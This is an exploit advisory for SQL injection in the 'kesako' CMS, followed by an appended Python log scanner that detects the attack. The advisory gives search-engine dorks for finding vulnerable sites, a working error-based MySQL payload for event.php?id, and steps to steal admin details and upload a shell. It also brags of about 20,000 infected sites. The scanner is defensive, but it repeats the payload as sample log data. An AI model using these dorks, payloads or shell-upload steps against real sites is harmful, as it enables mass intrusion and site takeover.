kesako script SQL Injection
===================================================================
####################################################################
.:. Exploit Title : kesako Script Sql Injection
.:. Author : Microsoft-dz
.:. Contact : [ifyoucanbebeme@gmail.com]
.:. Dork : intext:powered by [kesako] inurl:/event.php?id=
.:. Dork 2 : intext:powered by [kesako]
.:. Tested on : win&linux
.:. Vendor's Website : http://www.kesako.ch/cms/
.:. Date : [2014/5/19]
####################################################################

VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
[~] www.site.com/modules/event.php?id=[SQL INJECTION]

#########
P0C
#########
Type: String Mysql Injection
http://SITE/modules/event.php?id=[SQL INJECTION]
http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

####################################################################
1- Get Admin Infos
2- then login and upload your shell
Enjoy
About #20K Infected Websites :v
You Can Find The Admin Panel @ http://site/cms/admin
or http://site/cms/user/
or http://site/cms/login/
####################################################################
Tnx: R3Z0Uk4
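
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for requests to /modules/event.php whose id parameter is not a plain integer and labels those carrying the error-based markers seen in the PoC. The log lines, IP addresses and the names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IPs), not real traffic.
# The second request reuses the advisory's query shape, placeholder included.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/May/2014:10:00:01 +0000] "GET /modules/event.php?id=202 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/May/2014:10:00:05 +0000] "GET /modules/event.php?id=202%20and(select%201%20from'
    '(select%20count(*),concat((select%20(select%20%String_Col%)%20from%20information_schema.tables%20'
    'limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1'
    ' HTTP/1.1" 200 812',
    '203.0.113.9 - - [19/May/2014:10:00:09 +0000] "GET /modules/event.php?id=12abc HTTP/1.1" 200 640',
    '198.51.100.7 - - [19/May/2014:10:00:12 +0000] "GET /index.php?id=12abc HTTP/1.1" 200 300',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of the error-based technique shown in the advisory's PoC.
ERROR_BASED = re.compile(r'information_schema|floor\s*\(\s*rand\s*\(|group\s+by')


def classify(line):
    """Return (client_ip, verdict) for a suspicious event.php request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith('/modules/event.php'):
        return None
    # parse_qs percent-decodes values; a legitimate event id is digits only.
    for value in parse_qs(url.query, keep_blank_values=True).get('id', []):
        if re.fullmatch(r'[0-9]+', value):
            continue
        if ERROR_BASED.search(value.lower()):
            return ip, 'error-based-sqli'
        return ip, 'non-numeric-id'
    return None


def scan(lines):
    """Classify every line and keep only the flagged requests."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == '__main__':
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same digits-only rule is the input check the id parameter needs on the server side, alongside a parameterized query.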